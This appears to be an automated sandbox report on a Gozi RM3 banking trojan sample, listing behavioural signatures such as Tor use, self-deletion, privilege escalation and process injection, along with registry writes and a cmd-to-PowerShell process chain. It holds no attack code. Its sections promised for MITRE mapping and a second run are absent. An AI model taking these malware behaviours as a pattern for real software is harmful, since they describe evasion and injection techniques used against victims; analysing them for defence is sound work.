Malware Analysis Report

2024-10-19 03:01

Sample ID: 220315-jy3feaahdk
Target: Restr.com
SHA256: 0f4395c5cdee1c9fe28ef9a63355594f0f7a23aa41e52b8085a0bda8715da13f
Tags: gozi_rm3 banker trojan
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: 0f4395c5cdee1c9fe28ef9a63355594f0f7a23aa41e52b8085a0bda8715da13f

Threat Level: Known bad

The file Restr.com was found to be: Known bad.

Malicious Activity Summary

gozi_rm3 banker trojan

Gozi RM3

Grants admin privileges

Deletes itself

Uses Tor communications

Drops file in System32 directory

Program crash

Modifies Internet Explorer settings

Delays execution with timeout.exe

Enumerates processes with tasklist

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Runs net.exe

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Discovers systems in the same network

Gathers system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2022-03-15 08:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2022-03-15 08:05
Reported: 2022-03-15 08:35
Platform: win7-20220310-en
Max time kernel: 813s
Max time network: 1783s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi RM3

banker trojan gozi_rm3

Grants admin privileges

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Uses Tor communications

Drops file in System32 directory

Note: the only path recorded under this signature is PowerShell's Start Menu shortcut (Windows PowerShell.lnk) with an unexpanded %ProgramData% token appended to the WindowsPowerShell\v1.0 directory, opened for modification by powershell.exe itself; no new executable is logged as written under System32 in this run.
Description Indicator Process Target
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies Internet Explorer settings

adware spyware
Note: the keys below are Internet Explorer's own per-user state written by iexplore.exe (window placement, new-tab-page bookkeeping, recovery flags). The MFV and DecayDateQueue values are DPAPI-protected blobs, recognisable by the leading 01000000d08c9ddf0115d1118c7a00c04fc297eb header; they are not attacker-controlled configuration, and this signature carries little weight on its own next to the PowerShell and Explorer.EXE activity recorded in this run.
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (binary value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (binary value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000000d1b8db92c8f7900356eaa87fa6ce42aa247aa119a4e55e3b00db422410a6442000000000e8000000002000020000000234346cc27fd74d2f996a365f28c9b36e7511d00a483c44a2187f6bc7adc54dc3001000053318a171a143268d2da4fbe28b0460a6d7977fd287c80334f275fc07a80b081da06f44ae4c360dbb00fd5ac771bd243195a63efdb96a654eabc854b77733c8ffcdf896e763138b4ebc220db1859e521f5817df34d6730dbd6b05825e841f861390c10d5e75c6380edc1b80db2ccbc200085a5ae0298bf5b4a0b9f746df7c6e7625553c4a74fb3cd9235bd47e3830abce883cca1a623628fb9c28efa7cd884300a3d35ba3e84be706c93f1bddd58a94b4c300e5650325b9a4c45f9fd35e960f40246c0c0d86bea56a1252eacf59a541695103270caa26a5d594d613eda940d9ea9d1c31259df9e37fb3d9f5500be7ffeedd0c10f077ef9d31e67d3bac7aa18e1e1b9af2e218965f78587cf8d89bf7fb84f4a567bc992182d5844e2a2ac4957b8a3d68704038a81ecd6d3c0835b8643c5400000006c6dd99d64a76f589eec6088af9785e884210325a2c0acb6c91560e6c46a192274a5ae86b91e7ab7148fb10beeda53a4d19c0de42efb087c04444bf5e5d41d21 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (binary value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (binary value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (binary value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (binary value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (binary value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000aba5a280f62324e21f7f014358dc7dc828ddc09c3f1209c6f292816716ad489d000000000e80000000020000200000005d3c957ae64c72dcdf974d8aab995bffa2d460e23d100038593cb637480f6aad200000002f31e5f4f1311847e5ffac143389ddbc70ba92904edbbb62588dc8a1be0d1e2840000000432722c5302fad0f3b00bc4947b6008f48fef9c7eab09ba0679698e4965ab81cb6ae14b00fefa2e9854de89198a0e65bc4d0909cd6e6f479a62a00a1419e9229 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 40e6dbe04b38d801 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000140a62193c077483292e4f6d9df2a0177eb679dadc9e0bb37c84ac51a3f5494f000000000e80000000020000200000004f2ea5f9daa1daa926b61a42f0f53ffa1df2c1d8622ece9fc6fbf3d4e2ec322230010000b94dc60e7ebc267dc91e1362f6bcf4388c2c870af1ddd1018c86a7c822866c62081143ccf1604650ae9e404ceb4a027f25c5c48f34dc36b19bddf0882b8e8d1d49a12fa83366b8267be50ad1eba781f73f7e084bba7cd11859d16de3a49907b2378a0d696b7c3769e24184c700c649601998c53d2ccaa8cd3ff2ffcf9ade9396a9611eff189d8ad0a20116f164ff0940159c8bcbe8bc3bbd2851ed52c8b8acff7b6e44cd683d0f96e84b086d3432bea1e668c6a83946269b07afd645ac621644689f12e09d1dc35890f6843b576be7b24d1293b274a857f3e3b6f6d4f440c27f967846be2e7b88391e4f9ea0db8e636a187dfad5652475a050593facd189bfb4dd5171fed4e38925b869d16e66560f2243ad90c32edc84fb64484c84a34140409625d0e2fd6bf94545d277c49ef89fc7400000002d5a52d1000e5e2acb15a94b9cdb455034a15db0cfea7f109b91eb32a78a9f4a55abd17016ee42870400a14bddab5927f79f4f9e59d96caae0edf68bd80afe1f C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (binary value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{17D90BF1-A43F-11EC-A594-F6E36C9641D9} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Runs net.exe

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Restr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2020 wrote to memory of 1840 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2020 wrote to memory of 1840 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2020 wrote to memory of 1840 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2020 wrote to memory of 1840 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2020 wrote to memory of 1080 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2020 wrote to memory of 1080 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2020 wrote to memory of 1080 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2020 wrote to memory of 1080 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1948 wrote to memory of 1012 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1948 wrote to memory of 1012 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1948 wrote to memory of 1012 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1012 wrote to memory of 1120 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 1012 wrote to memory of 1120 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 1012 wrote to memory of 1120 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1292 wrote to memory of 1640 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1292 wrote to memory of 1640 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1292 wrote to memory of 1640 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1292 wrote to memory of 844 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1292 wrote to memory of 844 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1292 wrote to memory of 844 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1292 wrote to memory of 1580 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1292 wrote to memory of 1580 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
